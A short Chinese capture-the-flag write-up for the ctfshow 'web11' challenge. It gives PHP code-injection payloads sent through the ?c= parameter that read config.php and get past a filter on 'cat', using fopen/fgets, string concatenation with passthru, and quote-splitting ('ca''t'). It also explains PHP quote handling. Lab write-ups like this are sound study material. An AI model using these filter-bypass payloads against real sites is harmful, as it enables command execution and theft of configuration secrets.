ctfshow 萌新web11
又增加了cat的绕过
这个payload依然可用
?c=$file_handle = fopen("config.php","r");if ($file_handle){while (!feof($file_handle)) { $line = fgets($file_handle); echo $line; echo "<br />"; }}fclose($file_handle);
或者是字符拼接
?c=$a='ca';$b='t';$c=$a.$b;passthru("$c config.php");
对于执行函数 passthru内的内容
一定要是双引号 因为对于php
在php语言中单引号串和双引号串的处理是不同的。双引号串中的内容可以被解释而且替换,而单引号串中的内容总被认为是普通字符。也就是说,如果这里用了单引号的话,php会认为他就是一个普通的变量c,无法解释出系统命令cat的功能。
简单来说:单引号内部的变量不会执行双引号会执行
如 $name = 'hello'; echo "the $name"; 会输出 the hello 而如果是单引号 $name = 'hello'; echo 'the $name'; 会输出 the $name
或者是单引号绕过cat过滤
?c=passthru("ca''t config.php");